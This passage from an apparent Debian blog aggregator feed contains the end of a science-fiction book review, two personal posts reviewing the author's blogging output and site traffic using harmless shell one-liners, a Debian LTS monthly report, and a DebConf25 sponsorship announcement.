We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well.
There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into.
There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts.
Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly.
This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended.
Followed by Ghostdrift.
Rating: 9 out of 10
Well, 2024 will be remembered, won't it? I guess 2025 already wants to make its mark too, but let's not worry about that right now, and instead let's talk about me.
A little over a year ago, I was gloating over how I had such a great blogging year in 2022, and was considering 2023 to be average, then went on to gather more stats and traffic analysis... Then I said, and I quote:
I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...
What a load of bollocks.
2024 was the second worst year ever in my blogging history, tied with 2009 at a measly 6 posts for the year:
anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | grep -v 2025 | tail -3
6 2024
6 2009
3 2014
I did write about my work though, detailing the migration from Gitolite to GitLab we completed that year. But after August, total radio silence until now.
It's not that I have nothing to say: I have no less than five drafts in my working tree here, not counting three actual drafts recorded in the Git repository here:
anarcat@angela:anarc.at$ git s blog
## main...origin/main
?? blog/bell-bot.md
?? blog/fish.md
?? blog/kensington.md
?? blog/nixos.md
?? blog/tmux.md
anarcat@angela:anarc.at$ git grep -l '\!tag draft'
blog/mobile-massive-gallery.md
blog/on-dying.mdwn
blog/secrets-recovery.md
I just don't have time to wrap those things up. I think part of me is disgusted by seeing my work stolen by large corporations to build proprietary large language models while my idols have been pushed to suicide for trying to share science with the world.
Another part of me wants to make those things just right. The "tagged drafts" above are nothing more than a huge pile of chaotic links, far from being useful for anyone else than me, and even then.
The on-dying
article, in particular, is becoming my nemesis. I've
been wanting to write that article for over 6 years now, I think. It's
just too hard.
There's also the fact that I write for work already. A lot. Here are the top-10 contributors to our team's wiki:
anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
4272 anarcat
423 jerome
117 zen
116 lelutin
104 peter
58 kez
45 irl
43 hiro
18 gaba
17 groente
... but that's a bit unfair, since I've been there half a decade. Here's the last year:
anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
827 anarcat
117 zen
116 lelutin
91 jerome
17 groente
10 gaba
8 micah
7 kez
5 jnewsome
4 stephen.swift
So I still write the most commits! But to truly get a sense of the amount I wrote in there, we should count actual changes. Here it is by number of lines (from commandlinefu.com):
anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
99046 Antoine Beaupré
6900 Zen Fu
4784 Jérôme Charaoui
1446 Gabriel Filion
1146 Jerome Charaoui
837 groente
705 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
That, of course, is the entire history of the git repo, again. We
should take only the last year into account, and probably ignore the
tails
directory, as sneaky Zen Fu imported the entire docs from
another wiki there...
anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
75037 Antoine Beaupré
2932 Jérôme Charaoui
1442 Gabriel Filion
1400 Zen Fu
929 Jerome Charaoui
837 groente
702 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
Pretty good! 75k lines. But those are the files that were modified in the last year. If we go a little more nuts, we find that:
anarcat@angela:help.torproject.org$ $ git-count-words-range.py | sort -k6 -nr | head -10
parsing commits for words changes from command: git log '--since=1 year ago' '--format=%H %al'
anarcat 126116 - 36932 = 89184
zen 31774 - 5749 = 26025
groente 9732 - 607 = 9125
lelutin 10768 - 2578 = 8190
jerome 6236 - 2586 = 3650
gaba 3164 - 491 = 2673
stephen.swift 2443 - 673 = 1770
kez 1034 - 74 = 960
micah 772 - 250 = 522
weasel 410 - 0 = 410
I wrote 126,116 words in that wiki, only in the last year. I also deleted 37k words, so the final total is more like 89k words, but still: that's about forty (40!) articles of the average size (~2k) I wrote in 2022.
(And yes, I did go nuts and write a new log parser, essentially from scratch, to figure out those word diffs. I did get the courage only after asking GPT-4o for an example first, I must admit.)
Let's celebrate that again: I wrote 90 thousand words in that wiki in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000 words, which would mean I wrote about a novella and a novel, in the past year.
But interestingly, if I look at the repository analytics. I certainly didn't write that much more in the past year. So that alone cannot explain the lull in my production here.
Another part of me is just tired of the bickering and arguing on the internet. I have at least two articles in there that I suspect is going to get me a lot of push-back (NixOS and Fish). I know how to deal with this: you need to write well, consider the controversy, spell it out, and defuse things before they happen. But that's hard work and, frankly, I don't really care that much about what people think anymore.
I'm not writing here to convince people. I have stop evangelizing a long time ago. Now, I'm more into documenting, and teaching. And, while teaching, there's a two-way interaction: when you give out a speech or workshop, people can ask questions, or respond, and you all learn something. When you document, you quickly get told "where is this? I couldn't find it" or "I don't understand this" or "I tried that and it didn't work" or "wait, really? shouldn't we do X instead", and you learn.
Here, it's static. It's my little soapbox where I scream in the void. The only thing people can do is scream back.
So.
Let's see if we can work together here.
If you don't like something I say, disagree, or find something wrong or to be improved, instead of screaming on social media or ignoring me, try contributing back. This site here is backed by a git repository and I promise to read everything you send there, whether it is an issue or a merge request.
I will, of course, still read comments sent by email or IRC or social media, but please, be kind.
You can also, of course, follow the latest changes on the TPA wiki. If you want to catch up with the last year, some of the "novellas" I wrote include:
torproject.org
(Well, no, you can't actually follow changes on a GitLab wiki. But we have a wiki-replica git repository where you can see the latest commits, and subscribe to the RSS feed.)
See you there!
So this blog is now celebrating its 21st birthday (or 20 if you count from zero, or 18 if you want to be pedantic), and I figured I would do this yearly thing of reviewing how that went.
2022 was the official 20th anniversary in any case, and that was one of my best years on record, with 46 posts, surpassed only by the noisy 2005 (62) and matching 2006 (46). 2023, in comparison, was underwhelming: a feeble 11 posts! What happened!
Well, I was busy with other things, mostly away from keyboard, that I will not bore you with here...
The other thing that happened is that the one-liner I used to collect stats was broken (it counted folders and other unrelated files) and wildly overestimated 2022! Turns out I didn't write that much then:
anarc.at$ ls blog | grep '^[0-9][0-9][0-9][0-9].*.md' | sed s/-.*// | sort | uniq -c | sort -n -k2
57 2005
43 2006
20 2007
20 2008
7 2009
13 2010
16 2011
11 2012
13 2013
5 2014
13 2015
18 2016
29 2017
27 2018
17 2019
18 2020
14 2021
28 2022
10 2023
1 2024
But even that is inaccurate because, in ikiwiki, I can tag any page as being featured on the blog. So we actually need to process the HTML itself because we don't have much better on hand without going through ikiwiki's internals:
anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c
56 2005
42 2006
19 2007
18 2008
6 2009
12 2010
15 2011
10 2012
11 2013
3 2014
15 2015
32 2016
50 2017
37 2018
19 2019
19 2020
15 2021
28 2022
13 2023
Which puts the top 10 years at:
$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | head -10
56 2005
50 2017
42 2006
37 2018
32 2016
28 2022
19 2020
19 2019
19 2007
18 2008
Anyway. 2023 is certainly not a glorious year in that regard, in any case.
In terms of visits, however, we had quite a few hits. According to Goatcounter, I had 122 300 visits in 2023! 2022, in comparison, had 89 363, so that's quite a rise.
I seem to have hit the Hacker News front page at least twice. I say "seem" because it's actually pretty hard to tell what the HN frontpage actually is on any given day. I had 22k visits on 2023-03-13, in any case, and you can't see me on the front that day. We do see a post of mine on 2023-09-02, all the way down there, which seem to have generated another 10k visits.
In any case, here were the most popular stories for you fine visitors:
Framework 12th gen laptop review: 24k visits, which is surprising for a 13k words article "without images", as some critics have complained. 15k referred by Hacker News. Good reference and time-consuming benchmarks, slowly bit-rotting.
That is, by far, my most popular article ever. A popular article in 2021 or 2022 was around 6k to 9k, so that's a big one. I suspect it will keep getting traffic for a long while.
Calibre replacement considerations: 15k visits, most of which without a referrer. Was actually an old article, but I suspect HN brought it back to light. I keep updating that wiki page regularly when I find new things, but I'm still using Calibre to import ebooks.
Hacking my Kobo Clara HD: is not new but always gathering more and more hits, it had 1800 hits in the first year, 4600 hits last year and now brought 6400 visitors to the blog! Not directly related, but this iFixit battery replacement guide I wrote also seem to be quite popular
Everything else was published before 2023. Replacing Smokeping with Prometheus is still around and Looking at Wayland terminal emulators makes an entry in the top five.
People send less and less private information when they browse the web. The number of visitors without referrers was 41% in 2021, it rose to 44% in 2023. Most of the remaining traffic comes from Google, but Hacker News is now a significant chunk, almost as big as Google.
In 2021, Google represented 23% of my traffic, in 2022, it was down to 15% so 18% is actually a rise from last year, even if it seems much smaller than what I usually think of.
Ratio | Referrer | Visits |
---|---|---|
18% | 22 098 | |
13% | Hacker News | 16 003 |
2% | duckduckgo.com | 2 640 |
1% | community.frame.work | 1 090 |
1% | missing.csail.mit.edu | 918 |
Note that Facebook and Twitter do not appear at all in my referrers.
Unsurprisingly, most visits still come from the US:
Ratio | Country | Visits |
---|---|---|
26% | United States | 32 010 |
14% | France | 17 046 |
10% | Germany | 11 650 |
6% | Canada | 7 425 |
5% | United Kingdom | 6 473 |
3% | Netherlands | 3 436 |
Those ratios are nearly identical to last year, but quite different from 2021, where Germany and France were more or less reversed.
Back in 2021, I mentioned there was a long tail of countries with at least one visit, with 160 countries listed. I expanded that and there's now 182 countries in that list, almost all of the 193 member states in the UN.
Chrome's dominance continues to expand, even on readers of this blog, gaining two percentage points from Firefox compared to 2021.
Ratio | Browser | Visits |
---|---|---|
49% | Firefox | 60 126 |
36% | Chrome | 44 052 |
14% | Safari | 17 463 |
1% | Others | N/A |
It seems like, unfortunately, my Lynx and Haiku users have not visited in the past year. It seems like trying to read those metrics is like figuring out tea leaves...
In terms of operating systems:
Ratio | OS | Visits |
---|---|---|
28% | Linux | 34 010 |
23% | macOS | 28 728 |
21% | Windows | 26 303 |
17% | Android | 20 614 |
10% | iOS | 11 741 |
Again, Linux and Mac are over-represented, and Android and iOS are under-represented.
I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...
So anyway, thanks for coming, faithful reader, and see you in the coming 2024 year...
This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
As new CVEs for ffmpeg appeared, I started to work again for an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:
As new CVEs for ffmpeg appeared, I started to work again for an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie.
Unfortunately I didn’t found any time to work on this topic.
This month I uploaded new packages or new upstream or bugfix versions of:
This month I uploaded new upstream or bugfix versions of:
This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.
08 February, 2025 06:41PM by alteholz
We are pleased to announce that Proxmox has committed to sponsor DebConf25 as a Platinum Sponsor.
Proxmox develops powerful, yet easy-to-use Open Source server software. The product portfolio from Proxmox, including server virtualization, backup, and email security, helps companies of any size, sector, or industry to simplify their IT infrastructures. The Proxmox solutions are based on the great Debian platform, and we are happy that we can give back to the community by sponsoring DebConf25.
With this commitment as Platinum Sponsor, Proxmox is contributing to the Debian annual Developers' conference, directly supporting the progress of Debian and Free Software. Proxmox contributes to strengthen the community that collaborates on Debian projects from all around the world throughout all of the year.
Thank you very much, Proxmox, for your support of DebConf25!
DebConf25 will take place from 14 to 20 July 2025 in Brest, France, and will be preceded by DebCamp, from 7 to 13 July 2025.
DebConf25 is accepting sponsors! Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf25 website at https://debconf25.debconf.org/sponsors /become-a-sponsor/.
06 February, 2025 10:50AM by Sahil Dhiman